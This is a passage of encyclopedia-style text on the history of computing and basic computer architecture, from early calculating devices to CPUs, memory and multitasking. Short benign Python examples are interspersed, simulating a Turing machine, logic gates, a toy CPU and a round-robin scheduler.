The word continued to have the same meaning until the middle of the 20th century. During the latter part of this period, women were often hired as computers because they could be paid less than their male counterparts. 1 By 1943, most human computers were women. 2 The Online Etymology Dictionary gives the first attested use of computer in the 1640s, meaning 'one who calculates'; this is an "agent noun from compute (v.) . The Online Etymology Dictionary states that the use of the term to mean 'calculating machine' (of any type) is from 1897. The Online Etymology Dictionary indicates that the "modern use" of the term, to mean 'programmable digital electronic computer' dates from "1945 under this name; in a theoretical sense from 1937, as Turing machine". 3 The name has remained, although modern computers are capable of many higher-level functions. Devices have been used to aid computation for thousands of years, mostly using one-to-one correspondence with fingers. The earliest counting device was most likely a form of tally stick. Later record keeping aids throughout the Fertile Crescent included calculi (clay spheres, cones, etc.) which represented counts of items, likely livestock or grains, sealed in hollow unbaked clay containers. a 4 The use of counting rods is one example. The abacus was initially used for arithmetic tasks. The Roman abacus was developed from devices used in Babylonia as early as 2400 BCE. Since then, many other forms of reckoning boards or tables have been invented. In a medieval European counting house, a checkered cloth would be placed on a table, and markers moved around on it according to certain rules, as an aid to calculating sums of money. 5 The Antikythera mechanism is believed to be the earliest known mechanical analog computer, according to Derek J. de Solla Price. 6 It was designed to calculate astronomical positions. It was discovered in 1901 in the Antikythera wreck off the Greek island of Antikythera, between Kythera and Crete, and has been dated to approximately c. 100 BCE. Devices of comparable complexity to the Antikythera mechanism would not reappear until the fourteenth century. 7 Many mechanical aids to calculation and measurement were constructed for astronomical and navigation use. The planisphere was a star chart invented by Ab Rayh n al-B r n in the early 11th century. 8 The astrolabe was invented in the Hellenistic world in either the 1st or 2nd centuries BCE and is often attributed to Hipparchus. A combination of the planisphere and dioptra, the astrolabe was effectively an analog computer capable of working out several different kinds of problems in spherical astronomy. An astrolabe incorporating a mechanical calendar computer 9 10 and gear-wheels was invented by Abi Bakr of Isfahan, Persia in 1235. 11 Ab Rayh n al-B r n invented the first mechanical geared lunisolar calendar astrolabe, 12 an early fixed-wired knowledge processing machine 13 with a gear train and gear-wheels, 14 c. 1000 AD. The sector, a calculating instrument used for solving problems in proportion, trigonometry, multiplication and division, and for various functions, such as squares and cube roots, was developed in the late 16th century and found application in gunnery, surveying and navigation. The planimeter was a manual instrument to calculate the area of a closed figure by tracing over it with a mechanical linkage. The slide rule was invented around 1620 1630, by the English clergyman William Oughtred, shortly after the publication of the concept of the logarithm. 
It is a hand-operated analog computer for doing multiplication and division. As slide rule development progressed, added scales provided reciprocals, squares and square roots, cubes and cube roots, as well as transcendental functions such as logarithms and exponentials, circular and hyperbolic trigonometry and other functions. Slide rules with special scales are still used for quick performance of routine calculations, such as the E6B circular slide rule used for time and distance calculations on light aircraft. In the 1770s, Pierre Jaquet-Droz, a Swiss watchmaker, built a mechanical doll (automaton) that could write holding a quill pen. By switching the number and order of its internal wheels different letters, and hence different messages, could be produced. In effect, it could be mechanically "programmed" to read instructions. Along with two other complex machines, the doll is at the Mus e d'Art et d'Histoire of Neuch tel, Switzerland, and still operates. 15 In 1831 1835, mathematician and engineer Giovanni Plana devised a Perpetual Calendar machine, which, through a system of pulleys and cylinders and over, could predict the perpetual calendar for every year from 0 CE (that is, 1 BCE) to 4000 CE, keeping track of leap years and varying day length. The tide-predicting machine invented by the Scottish scientist Sir William Thomson in 1872 was of great utility to navigation in shallow waters. It used a system of pulleys and wires to automatically calculate predicted tide levels for a set period at a particular location. The differential analyser, a mechanical analog computer designed to solve differential equations by integration, used wheel-and-disc mechanisms to perform the integration. In 1876, Sir William Thomson had already discussed the possible construction of such calculators, but he had been stymied by the limited output torque of the ball-and-disk integrators. 16 In a differential analyzer, the output of one integrator drove the input of the next integrator, or a graphing output. The torque amplifier was the advance that allowed these machines to work. Starting in the 1920s, Vannevar Bush and others developed mechanical differential analyzers. In the 1890s, the Spanish engineer Leonardo Torres Quevedo began to develop a series of advanced analog machines that could solve real and complex roots of polynomials, 17 18 19 20 which were published in 1901 by the Paris Academy of Sciences. 21 Charles Babbage, an English mechanical engineer and polymath, originated the concept of a programmable computer. Considered the "father of the computer", 22 he conceptualized and invented the first mechanical computer in the early 19th century. After working on his difference engine he announced his invention in 1822, in a paper to the Royal Astronomical Society, titled "Note on the application of machinery to the computation of astronomical and mathematical tables", 23 he also designed to aid in navigational calculations, in 1833 he realized that a much more general design, an analytical engine, was possible. The input of programs and data was to be provided to the machine via punched cards, a method being used at the time to direct mechanical looms such as the Jacquard loom. For output, the machine would have a printer, a curve plotter and a bell. The machine would also be able to punch numbers onto cards to be read in later. 
The engine would incorporate an arithmetic logic unit, control flow in the form of conditional branching and loops, and integrated memory, making it the first design for a general-purpose computer that could be described in modern terms as Turing-complete. 24 25 The machine was about a century ahead of its time. All the parts for his machine had to be made by hand this was a major problem for a device with thousands of parts. Eventually, the project was dissolved with the decision of the British Government to cease funding. Babbage's failure to complete the analytical engine can be chiefly attributed to political and financial difficulties as well as his desire to develop an increasingly sophisticated computer and to move ahead faster than anyone else could follow. Nevertheless, his son, Henry Babbage, completed a simplified version of the analytical engine's computing unit (the mill) in 1888. He gave a successful demonstration of its use in computing tables in 1906. In his work Essays on Automatics published in 1914, Leonardo Torres Quevedo wrote a brief history of Babbage's efforts at constructing a mechanical Difference Engine and Analytical Engine. The paper contains a design of a machine capable to calculate formulas like a x ( y z ) 2 displaystyle a x (y-z) 2 , for a sequence of sets of values. The whole machine was to be controlled by a read-only program, which was complete with provisions for conditional branching. He also introduced the idea of floating-point arithmetic. 26 27 28 In 1920, to celebrate the 100th anniversary of the invention of the arithmometer, Torres presented in Paris the Electromechanical Arithmometer, which allowed a user to input arithmetic problems through a keyboard, and computed and printed the results, 29 30 31 32 demonstrating the feasibility of an electromechanical analytical engine. 33 During the first half of the 20th century, many scientific computing needs were met by increasingly sophisticated analog computers, which used a direct mechanical or electrical model of the problem as a basis for computation. However, these were not programmable and generally lacked the versatility and accuracy of modern digital computers. 34 The first modern analog computer was a tide-predicting machine, invented by Sir William Thomson (later to become Lord Kelvin) in 1872. The differential analyser, a mechanical analog computer designed to solve differential equations by integration using wheel-and-disc mechanisms, was conceptualized in 1876 by James Thomson, the elder brother of the more famous Sir William Thomson. 16 The art of mechanical analog computing reached its zenith with the differential analyzer, built by H. L. Hazen and Vannevar Bush at MIT starting in 1927. This built on the mechanical integrators of James Thomson and the torque amplifiers invented by H. W. Nieman. A dozen of these devices were built before their obsolescence became obvious. By the 1950s, the success of digital electronic computers had spelled the end for most analog computing machines, but analog computers remained in use during the 1950s in some specialized applications such as education (slide rule) and aircraft (control systems). By 1938, the United States Navy had developed an electromechanical analog computer small enough to use aboard a submarine. This was the Torpedo Data Computer, which used trigonometry to solve the problem of firing a torpedo at a moving target. During World War II similar devices were developed in other countries as well. 
Early digital computers were electromechanical; electric switches drove mechanical relays to perform the calculation. These devices had a low operating speed and were eventually superseded by much faster all-electric computers, originally using vacuum tubes. The Z2, created by German engineer Konrad Zuse in 1939 in Berlin, was one of the earliest examples of an electromechanical relay computer. 35 In 1941, Zuse followed his earlier machine up with the Z3, the world's first working electromechanical programmable, fully automatic digital computer. 38 39 The Z3 was built with 2000 relays, implementing a 22 bit word length that operated at a clock frequency of about 5 10 Hz. 40 Program code was supplied on punched film while data could be stored in 64 words of memory or supplied from the keyboard. It was quite similar to modern machines in some respects, pioneering numerous advances such as floating-point numbers. Rather than the harder-to-implement decimal system (used in Charles Babbage's earlier design), using a binary system meant that Zuse's machines were easier to build and potentially more reliable, given the technologies available at that time. 41 The Z3 was not itself a universal computer but could be extended to be Turing complete. 42 43 Zuse's next computer, the Z4, became the world's first commercial computer; after initial delay due to the Second World War, it was completed in 1950 and delivered to the ETH Zurich. 44 The computer was manufactured by Zuse's own company, Zuse KG, which was founded in 1941 as the first company with the sole purpose of developing computers in Berlin. 44 Purely electronic circuit elements soon replaced their mechanical and electromechanical equivalents, at the same time that digital calculation replaced analog. The engineer Tommy Flowers, working at the Post Office Research Station in London in the 1930s, began to explore the possible use of electronics for the telephone exchange. Experimental equipment that he built in 1934 went into operation five years later, converting a portion of the telephone exchange network into an electronic data processing system, using thousands of vacuum tubes. 34 In the US, John Vincent Atanasoff and Clifford E. Berry of Iowa State University developed and tested the Atanasoff Berry Computer (ABC) in 1942, 45 the first "automatic electronic digital computer". 46 This design was also all-electronic and used about 300 vacuum tubes, with capacitors fixed in a mechanically rotating drum for memory. 47 During World War II, the British code-breakers at Bletchley Park achieved a number of successes at breaking encrypted German military communications. The German encryption machine, Enigma, was first attacked with the help of the electro-mechanical bombes which were often run by women. 48 49 To crack the more sophisticated German Lorenz SZ 40 42 machine, used for high-level Army communications, Max Newman and his colleagues commissioned Flowers to build the Colossus. 47 He spent eleven months from early February 1943 designing and building the first Colossus. 50 After a functional test in December 1943, Colossus was shipped to Bletchley Park, where it was delivered on 18 January 1944 51 and attacked its first message on 5 February. 47 Colossus was the world's first electronic digital programmable computer. 34 It used a large number of valves (vacuum tubes). It had paper-tape input and was capable of being configured to perform a variety of boolean logical operations on its data, but it was not Turing-complete. 
Nine Mk II Colossi were built (The Mk I was converted to a Mk II making ten machines in total). Colossus Mark I contained 1,500 thermionic valves (tubes), but Mark II with 2,400 valves, was both five times faster and simpler to operate than Mark I, greatly speeding the decoding process. 52 53 The ENIAC 54 (Electronic Numerical Integrator and Computer) was the first electronic programmable computer built in the U.S. Although the ENIAC was similar to the Colossus, it was much faster, more flexible, and it was Turing-complete. Like the Colossus, a "program" on the ENIAC was defined by the states of its patch cables and switches, a far cry from the stored program electronic machines that came later. Once a program was written, it had to be mechanically set into the machine with manual resetting of plugs and switches. The programmers of the ENIAC were six women, often known collectively as the "ENIAC girls". 55 56 It combined the high speed of electronics with the ability to be programmed for many complex problems. It could add or subtract 5000 times a second, a thousand times faster than any other machine. It also had modules to multiply, divide, and square root. High speed memory was limited to 20 words (about 80 bytes). Built under the direction of John Mauchly and J. Presper Eckert at the University of Pennsylvania, ENIAC's development and construction lasted from 1943 to full operation at the end of 1945. The machine was huge, weighing 30 tons, using 200 kilowatts of electric power and contained over 18,000 vacuum tubes, 1,500 relays, and hundreds of thousands of resistors, capacitors, and inductors. 57 The principle of the modern computer was proposed by Alan Turing in his seminal 1936 paper, 58 On Computable Numbers. Turing proposed a simple device that he called "Universal Computing machine" and that is now known as a universal Turing machine. He proved that such a machine is capable of computing anything that is computable by executing instructions (program) stored on tape, allowing the machine to be programmable. The fundamental concept of Turing's design is the stored program, where all the instructions for computing are stored in memory. Von Neumann acknowledged that the central concept of the modern computer was due to this paper. 59 Turing machines are to this day a central object of study in theory of computation. Except for the limitations imposed by their finite memory stores, modern computers are said to be Turing-complete, which is to say, they have algorithm execution capability equivalent to a universal Turing machine. Early computing machines had fixed programs. Changing its function required the re-wiring and re-structuring of the machine. 47 With the proposal of the stored-program computer this changed. A stored-program computer includes by design an instruction set and can store in memory a set of instructions (a program) that details the computation. The theoretical basis for the stored-program computer was laid out by Alan Turing in his 1936 paper. In 1945, Turing joined the National Physical Laboratory and began work on developing an electronic stored-program digital computer. His 1945 report "Proposed Electronic Calculator" was the first specification for such a device. John von Neumann at the University of Pennsylvania also circulated his First Draft of a Report on the EDVAC in 1945. 34 The Manchester Baby was the world's first stored-program computer. It was built at the University of Manchester in England by Frederic C. 
Williams, Tom Kilburn and Geoff Tootill, and ran its first program on 21 June 1948. 60 It was designed as a testbed for the Williams tube, the first random-access digital storage device. 61 Although the computer was described as "small and primitive" by a 1998 retrospective, it was the first working machine to contain all of the elements essential to a modern electronic computer. 62 As soon as the Baby had demonstrated the feasibility of its design, a project began at the university to develop it into a practically useful computer, the Manchester Mark 1. The Mark 1 in turn quickly became the prototype for the Ferranti Mark 1, the world's first commercially available general-purpose computer. 63 Built by Ferranti, it was delivered to the University of Manchester in February 1951. At least seven of these later machines were delivered between 1953 and 1957, one of them to Shell labs in Amsterdam. 64 In October 1947 the directors of British catering company J. Lyons Company decided to take an active role in promoting the commercial development of computers. Lyons's LEO I computer, modelled closely on the Cambridge EDSAC of 1949, became operational in April 1951 65 and ran the world's first routine office computer job. The concept of a field-effect transistor was proposed by Julius Edgar Lilienfeld in 1925. John Bardeen and Walter Brattain, while working under William Shockley at Bell Labs, built the first working transistor, the point-contact transistor, in 1947, which was followed by Shockley's bipolar junction transistor in 1948. 66 67 From 1955 onwards, transistors replaced vacuum tubes in computer designs, giving rise to the "second generation" of computers. Compared to vacuum tubes, transistors have many advantages: they are smaller, and require less power than vacuum tubes, so give off less heat. Junction transistors were much more reliable than vacuum tubes and had longer, indefinite, service life. Transistorized computers could contain tens of thousands of binary logic circuits in a relatively compact space. However, early junction transistors were relatively bulky devices that were difficult to manufacture on a mass-production basis, which limited them to a number of specialized applications. 68 At the University of Manchester, a team under the leadership of Tom Kilburn designed and built a machine using the newly developed transistors instead of valves. 69 Their first transistorized computer and the first in the world, was operational by 1953, and a second version was completed there in April 1955. However, the machine did make use of valves to generate its 125 kHz clock waveforms and in the circuitry to read and write on its magnetic drum memory, so it was not the first completely transistorized computer. That distinction goes to the Harwell CADET of 1955, 70 built by the electronics division of the Atomic Energy Research Establishment at Harwell. 70 71 The metal oxide silicon field-effect transistor (MOSFET), also known as the MOS transistor, was invented by Mohamed M. Atalla and Dawon Kahng at Bell Labs in 1959. 72 It was the first truly compact transistor that could be miniaturized and mass-produced for a wide range of uses. 68 With its high scalability, 73 and much lower power consumption and higher density than bipolar junction transistors, 74 the MOSFET made it possible to build high-density integrated circuits. 
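Stepping back from the hardware chronology for a moment: the universal Turing machine introduced a few sentences earlier (Turing's 1936 "Universal Computing machine") can be made concrete with a short simulator. This is only a sketch; the rule format is an assumption of the example, and the transition table implements a binary increment chosen purely as an illustration, not anything defined in the article.

def run_turing_machine(tape, rules, state="right", blank="_", max_steps=1000):
    """Simulate a single-tape Turing machine.

    tape  : dict mapping cell index -> symbol (sparse tape)
    rules : dict mapping (state, symbol) -> (write, move, next_state),
            where move is -1 (left) or +1 (right)
    """
    head = 0
    for _ in range(max_steps):
        if state == "halt":
            break
        symbol = tape.get(head, blank)
        write, move, state = rules[(state, symbol)]
        tape[head] = write
        head += move
    return tape

# Transition table for binary increment (illustrative choice): scan right to the
# end of the number, then add 1 with carry while moving back left.
INCREMENT = {
    ("right", "0"): ("0", +1, "right"),
    ("right", "1"): ("1", +1, "right"),
    ("right", "_"): ("_", -1, "carry"),
    ("carry", "1"): ("0", -1, "carry"),   # 1 + carry -> 0, keep carrying
    ("carry", "0"): ("1", -1, "halt"),    # 0 + carry -> 1, done
    ("carry", "_"): ("1", -1, "halt"),    # carry past the leftmost digit
}

tape = dict(enumerate("1011"))            # the number 11 in binary
result = run_turing_machine(tape, INCREMENT)
print("".join(result[i] for i in sorted(result) if result[i] != "_"))  # -> 1100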
75 76 In addition to data processing, it also enabled the practical use of MOS transistors as memory cell storage elements, leading to the development of MOS semiconductor memory, which replaced earlier magnetic-core memory in computers. The MOSFET led to the microcomputer revolution, 77 and became the driving force behind the computer revolution. 78 79 The MOSFET is the most widely used transistor in computers, 80 81 and is the fundamental building block of digital electronics. 82 The next great advance in computing power came with the advent of the integrated circuit (IC). The idea of the integrated circuit was first conceived by a radar scientist working for the Royal Radar Establishment of the Ministry of Defence, Geoffrey W.A. Dummer. Dummer presented the first public description of an integrated circuit at the Symposium on Progress in Quality Electronic Components in Washington, D.C., on 7 May 1952. 83 The first working ICs were invented by Jack Kilby at Texas Instruments and Robert Noyce at Fairchild Semiconductor. 84 Kilby recorded his initial ideas concerning the integrated circuit in July 1958, successfully demonstrating the first working integrated example on 12 September 1958. 85 In his patent application of 6 February 1959, Kilby described his new device as "a body of semiconductor material ... wherein all the components of the electronic circuit are completely integrated". 86 87 However, Kilby's invention was a hybrid integrated circuit (hybrid IC), rather than a monolithic integrated circuit (IC) chip. 88 Kilby's IC had external wire connections, which made it difficult to mass-produce. 89 Noyce also came up with his own idea of an integrated circuit half a year later than Kilby. 90 Noyce's invention was the first true monolithic IC chip. 91 89 His chip solved many practical problems that Kilby's had not. Produced at Fairchild Semiconductor, it was made of silicon, whereas Kilby's chip was made of germanium. Noyce's monolithic IC was fabricated using the planar process, developed by his colleague Jean Hoerni in early 1959. In turn, the planar process was based on Mohamed M. Atalla's work on semiconductor surface passivation by silicon dioxide in the late 1950s. 92 93 94 Modern monolithic ICs are predominantly MOS (metal oxide semiconductor) integrated circuits, built from MOSFETs (MOS transistors). 95 The earliest experimental MOS IC to be fabricated was a 16 transistor chip built by Fred Heiman and Steven Hofstein at RCA in 1962. 96 General Microelectronics later introduced the first commercial MOS IC in 1964, 97 developed by Robert Norman. 96 Following the development of the self-aligned gate (silicon-gate) MOS transistor by Robert Kerwin, Donald Klein and John Sarace at Bell Labs in 1967, the first silicon-gate MOS IC with self-aligned gates was developed by Federico Faggin at Fairchild Semiconductor in 1968. 98 The MOSFET has since become the most critical device component in modern ICs. 95 The development of the MOS integrated circuit led to the invention of the microprocessor, 99 100 and heralded an explosion in the commercial and personal use of computers. While the subject of exactly which device was the first microprocessor is contentious, partly due to lack of agreement on the exact definition of the term "microprocessor", it is largely undisputed that the first single-chip microprocessor was the Intel 4004, 101 designed and realized by Federico Faggin with his silicon-gate MOS IC technology, 99 along with Ted Hoff, Masatoshi Shima and Stanley Mazor at Intel. 
b 103 In the early 1970s, MOS IC technology enabled the integration of more than 10,000 transistors on a single chip. 76 System on a Chip (SoCs) are complete computers on a microchip (or chip) the size of a coin. 104 They may or may not have integrated RAM and flash memory. If not integrated, the RAM is usually placed directly above (known as Package on package) or below (on the opposite side of the circuit board) the SoC, and the flash memory is usually placed right next to the SoC, this all done to improve data transfer speeds, as the data signals do not have to travel long distances. Since ENIAC in 1945, computers have advanced enormously, with modern SoCs (Such as the Snapdragon 865) being the size of a coin while also being hundreds of thousands of times more powerful than ENIAC, integrating billions of transistors, and consuming only a few watts of power. The first mobile computers were heavy and ran from mains power. The 50 lb (23 kg) IBM 5100 was an early example. Later portables such as the Osborne 1 and Compaq Portable were considerably lighter but still needed to be plugged in. The first laptops, such as the Grid Compass, removed this requirement by incorporating batteries and with the continued miniaturization of computing resources and advancements in portable battery life, portable computers grew in popularity in the 2000s. 105 The same developments allowed manufacturers to integrate computing resources into cellular mobile phones by the early 2000s. These smartphones and tablets run on a variety of operating systems and recently became the dominant computing device on the market. 106 These are powered by System on a Chip (SoCs), which are complete computers on a microchip the size of a coin. 104 Computers can be classified in a number of different ways, including: The term hardware covers all of those parts of a computer that are tangible physical objects. Circuits, computer chips, graphic cards, sound cards, memory (RAM), motherboard, displays, power supplies, cables, keyboards, printers and "mice" input devices are all hardware. A general-purpose computer has four main components: the arithmetic logic unit (ALU), the control unit, the memory, and the input and output devices (collectively termed I O). These parts are interconnected by buses, often made of groups of wires. Inside each of these parts are thousands to trillions of small electrical circuits which can be turned off or on by means of an electronic switch. Each circuit represents a bit (binary digit) of information so that when the circuit is on it represents a "1", and when off it represents a "0" (in positive logic representation). The circuits are arranged in logic gates so that one or more of the circuits may control the state of one or more of the other circuits. When unprocessed data is sent to the computer with the help of input devices, the data is processed and sent to output devices. The input devices may be hand-operated or automated. The act of processing is mainly regulated by the CPU. Some examples of input devices are: The means through which computer gives output are known as output devices. Some examples of output devices are: The control unit (often called a control system or central controller) manages the computer's various components; it reads and interprets (decodes) the program instructions, transforming them into control signals that activate other parts of the computer. d Control systems in advanced computers may change the order of execution of some instructions to improve performance. 
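Earlier in the passage above, a computer's circuits are described as bits arranged in logic gates that control one another. A tiny sketch in this notebook's language shows how a handful of gate functions compose into a half adder, the smallest step from raw logic toward the arithmetic an ALU performs. The gate and function names here are illustrative only, not hardware.

def AND(a, b): return a and b
def OR(a, b):  return a or b
def NOT(a):    return not a
def XOR(a, b): return OR(AND(a, NOT(b)), AND(NOT(a), b))

def half_adder(a, b):
    """Add two one-bit values; return (sum_bit, carry_bit)."""
    return XOR(a, b), AND(a, b)

for a in (False, True):
    for b in (False, True):
        s, c = half_adder(a, b)
        print(int(a), "+", int(b), "= sum", int(s), "carry", int(c))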
A key component common to all CPUs is the program counter, a special memory cell (a register) that keeps track of which location in memory the next instruction is to be read from. e The control system's function is as follows— this is a simplified description, and some of these steps may be performed concurrently or in a different order depending on the type of CPU: Since the program counter is (conceptually) just another set of memory cells, it can be changed by calculations done in the ALU. Adding 100 to the program counter would cause the next instruction to be read from a place 100 locations further down the program. Instructions that modify the program counter are often known as "jumps" and allow for loops (instructions that are repeated by the computer) and often conditional instruction execution (both examples of control flow). The sequence of operations that the control unit goes through to process an instruction is in itself like a short computer program, and indeed, in some more complex CPU designs, there is another yet smaller computer called a microsequencer, which runs a microcode program that causes all of these events to happen. The control unit, ALU, and registers are collectively known as a central processing unit (CPU). Early CPUs were composed of many separate components. Since the 1970s, CPUs have typically been constructed on a single MOS integrated circuit chip called a microprocessor. The ALU is capable of performing two classes of operations: arithmetic and logic. 111 The set of arithmetic operations that a particular ALU supports may be limited to addition and subtraction, or might include multiplication, division, trigonometry functions such as sine, cosine, etc., and square roots. Some can operate only on whole numbers (integers) while others use floating point to represent real numbers, albeit with limited precision. However, any computer that is capable of performing just the simplest operations can be programmed to break down the more complex operations into simple steps that it can perform. Therefore, any computer can be programmed to perform any arithmetic operation—although it will take more time to do so if its ALU does not directly support the operation. An ALU may also compare numbers and return Boolean truth values (true or false) depending on whether one is equal to, greater than or less than the other ("is 64 greater than 65? ). Logic operations involve Boolean logic: AND, OR, XOR, and NOT. These can be useful for creating complicated conditional statements and processing Boolean logic. Superscalar computers may contain multiple ALUs, allowing them to process several instructions simultaneously. 112 Graphics processors and computers with SIMD and MIMD features often contain ALUs that can perform arithmetic on vectors and matrices. A computer's memory can be viewed as a list of cells into which numbers can be placed or read. Each cell has a numbered "address" and can store a single number. The computer can be instructed to "put the number 123 into the cell numbered 1357" or to "add the number that is in cell 1357 to the number that is in cell 2468 and put the answer into cell 1595. The information stored in memory may represent practically anything. Letters, numbers, even computer instructions can be placed into memory with equal ease. Since the CPU does not differentiate between different types of information, it is the software's responsibility to give significance to what the memory sees as nothing but a series of numbers. 
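The control-unit description above, a program counter that selects the next instruction and jumps that simply overwrite it, can be mirrored in a toy fetch-decode-execute loop. This is a sketch only, with a made-up instruction set (LOAD, ADD, JUMP_IF_LT, HALT) rather than any real CPU's encoding.

def run(program, registers=None):
    regs = registers or {"A": 0}
    pc = 0                                   # program counter
    while pc < len(program):
        op, *args = program[pc]              # fetch + decode
        pc += 1                              # default: fall through to the next cell
        if op == "LOAD":                     # LOAD reg, value
            regs[args[0]] = args[1]
        elif op == "ADD":                    # ADD reg, value
            regs[args[0]] += args[1]
        elif op == "JUMP_IF_LT":             # conditional jump: the basis of loops
            reg, limit, target = args
            if regs[reg] < limit:
                pc = target                  # changing the program counter *is* the jump
        elif op == "HALT":
            break
    return regs

# Count register A up to 5 using a backwards conditional jump (a loop).
program = [
    ("LOAD", "A", 0),          # address 0
    ("ADD", "A", 1),           # address 1
    ("JUMP_IF_LT", "A", 5, 1), # address 2: jump back to address 1 while A < 5
    ("HALT",),                 # address 3
]
print(run(program))            # -> {'A': 5}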
In almost all modern computers, each memory cell is set up to store binary numbers in groups of eight bits (called a byte). Each byte is able to represent 256 different numbers (28 256); either from 0 to 255 or 128 to 127. To store larger numbers, several consecutive bytes may be used (typically, two, four or eight). When negative numbers are required, they are usually stored in two's complement notation. Other arrangements are possible, but are usually not seen outside of specialized applications or historical contexts. A computer can store any kind of information in memory if it can be represented numerically. Modern computers have billions or even trillions of bytes of memory. The CPU contains a special set of memory cells called registers that can be read and written to much more rapidly than the main memory area. There are typically between two and one hundred registers depending on the type of CPU. Registers are used for the most frequently needed data items to avoid having to access main memory every time data is needed. As data is constantly being worked on, reducing the need to access main memory (which is often slow compared to the ALU and control units) greatly increases the computer's speed. Computer main memory comes in two principal varieties: RAM can be read and written to anytime the CPU commands it, but ROM is preloaded with data and software that never changes, therefore the CPU can only read from it. ROM is typically used to store the computer's initial start-up instructions. In general, the contents of RAM are erased when the power to the computer is turned off, but ROM retains its data indefinitely. In a PC, the ROM contains a specialized program called the BIOS that orchestrates loading the computer's operating system from the hard disk drive into RAM whenever the computer is turned on or reset. In embedded computers, which frequently do not have disk drives, all of the required software may be stored in ROM. Software stored in ROM is often called firmware, because it is notionally more like hardware than software. Flash memory blurs the distinction between ROM and RAM, as it retains its data when turned off but is also rewritable. It is typically much slower than conventional ROM and RAM however, so its use is restricted to applications where high speed is unnecessary. f In more sophisticated computers there may be one or more RAM cache memories, which are slower than registers but faster than main memory. Generally computers with this sort of cache are designed to move frequently needed data into the cache automatically, often without the need for any intervention on the programmer's part. I O is the means by which a computer exchanges information with the outside world. 114 Devices that provide input or output to the computer are called peripherals. 115 On a typical personal computer, peripherals include input devices like the keyboard and mouse, and output devices such as the display and printer. Hard disk drives, floppy disk drives and optical disc drives serve as both input and output devices. Computer networking is another form of I O. I O devices are often complex computers in their own right, with their own CPU and memory. A graphics processing unit might contain fifty or more tiny computers that perform the calculations necessary to display 3D graphics. citation needed Modern desktop computers contain many smaller computers that assist the main CPU in performing I O. A 2016 era flat screen display contains its own computer circuitry. 
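The memory model just described, numbered cells plus two's-complement bytes, can be exercised directly. The snippet below performs the exact "put 123 into cell 1357" and "add cell 1357 to cell 2468 and put the answer into cell 1595" operations the article quotes, then uses Python's own byte conversion to show one byte holding -5 in two's complement. The value 77 placed in cell 2468 is an arbitrary choice for the example.

memory = [0] * 4096                          # a small "main memory" of numbered cells

memory[1357] = 123                           # "put the number 123 into cell 1357"
memory[2468] = 77                            # arbitrary second operand
memory[1595] = memory[1357] + memory[2468]   # "add 1357 to 2468, store in 1595"
print(memory[1595])                          # -> 200

# One byte holds 256 patterns: 0..255 unsigned, or -128..127 in two's complement.
print((-5).to_bytes(1, "big", signed=True))          # -> b'\xfb' (0b11111011)
print(int.from_bytes(b"\xfb", "big", signed=True))   # -> -5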
While a computer may be viewed as running one gigantic program stored in its main memory, in some systems it is necessary to give the appearance of running several programs simultaneously. This is achieved by multitasking i.e. having the computer switch rapidly between running each program in turn. 116 One means by which this is done is with a special signal called an interrupt, which can periodically cause the computer to stop executing instructions where it was and do something else instead. By remembering where it was executing prior to the interrupt, the computer can return to that task later. If several programs are running "at the same time". then the interrupt generator might be causing several hundred interrupts per second, causing a program switch each time. Since modern computers typically execute instructions several orders of magnitude faster than human perception, it may appear that many programs are running at the same time even though only one is ever executing in any given instant. This method of multitasking is sometimes termed "time-sharing" since each program is allocated a "slice" of time in turn. 117 Before the era of inexpensive computers, the principal use for multitasking was to allow many people to share the same computer. Seemingly, multitasking would cause a computer that is switching between several programs to run more slowly, in direct proportion to the number of programs it is running, but most programs spend much of their time waiting for slow input output devices to complete their tasks. If a program is waiting for the user to click on the mouse or press a key on the keyboard, then it will not take a "time slice" until the event it is waiting for has occurred. This frees up time for other programs to execute so that many programs may be run simultaneously without unacceptable speed loss. Some computers are designed to distribute their work across several CPUs in a multiprocessing configuration, a technique once employed in only large and powerful machines such as supercomputers, mainframe computers and servers. Multiprocessor and multi-core (multiple CPUs on a single integrated circuit) personal and laptop computers are now widely available, and are being increasingly used in lower-end markets as a result. Supercomputers in particular often have highly unique architectures that differ significantly from the basic stored-program architecture and from general-purpose computers. g They often feature thousands of CPUs, customized high-speed interconnects, and specialized computing hardware. Such designs tend to be useful for only specialized tasks due to the large scale of program organization required to use most of the available resources at once. Supercomputers usually see usage in large-scale simulation, graphics rendering, and cryptography applications, as well as with other so-called "embarrassingly parallel" tasks. Software refers to parts of the computer which do not have a material form, such as programs, data, protocols, etc. Software is that part of a computer system that consists of encoded information or computer instructions, in contrast to the physical hardware from which the system is built. Computer software includes computer programs, libraries and related non-executable data, such as online documentation or digital media. It is often divided into system software and application software. Computer hardware and software require each other and neither can be realistically used on its own. 
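To make the time-sharing description above concrete, here is a small cooperative scheduler: each "program" is a generator, and the scheduler hands out one step (one "time slice") per turn. Real operating systems preempt running programs with hardware interrupts; this sketch, with invented task names, only mimics the rotation.

def counter(name, n):
    for i in range(1, n + 1):
        yield f"{name}: step {i}"           # yielding = "my time slice is over"

def round_robin(tasks):
    """Run each task for one step, rotating until all have finished."""
    tasks = list(tasks)
    while tasks:
        task = tasks.pop(0)
        try:
            print(next(task))
            tasks.append(task)              # not finished: back of the queue
        except StopIteration:
            pass                            # task finished: drop it

round_robin([counter("editor", 3), counter("browser", 2), counter("music", 4)])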
When software is stored in hardware that cannot easily be modified, such as with BIOS ROM in an IBM PC compatible computer, it is sometimes called "firmware". There are thousands of different programming languages—some intended for general purpose, others useful for only highly specialized applications. The defining feature of modern computers which distinguishes them from all other machines is that they can be programmed. That is to say that some type of instructions (the program) can be given to the computer, and it will process them. Modern computers based on the von Neumann architecture often have machine code in the form of an imperative programming language. In practical terms, a computer program may be just a few instructions or extend to many millions of instructions, as do the programs for word processors and web browsers for example. A typical modern computer can execute billions of instructions per second (gigaflops) and rarely makes a mistake over many years of operation. Large computer programs consisting of several million instructions may take teams of programmers years to write, and due to the complexity of the task almost certainly contain errors. This section applies to most common RAM machine based computers. In most cases, computer instructions are simple: add one number to another, move some data from one location to another, send a message to some external device, etc. These instructions are read from the computer's memory and are generally carried out (executed) in the order they were given. However, there are usually specialized instructions to tell the computer to jump ahead or backwards to some other place in the program and to carry on executing from there. These are called "jump" instructions (or branches). Furthermore, jump instructions may be made to happen conditionally so that different sequences of instructions may be used depending on the result of some previous calculation or some external event. Many computers directly support subroutines by providing a type of jump that "remembers" the location it jumped from and another instruction to return to the instruction following that jump instruction. Program execution might be likened to reading a book. While a person will normally read each word and line in sequence, they may at times jump back to an earlier place in the text or skip sections that are not of interest. Similarly, a computer may sometimes go back and repeat the instructions in some section of the program over and over again until some internal condition is met. This is called the flow of control within the program and it is what allows the computer to perform tasks repeatedly without human intervention. Comparatively, a person using a pocket calculator can perform a basic arithmetic operation such as 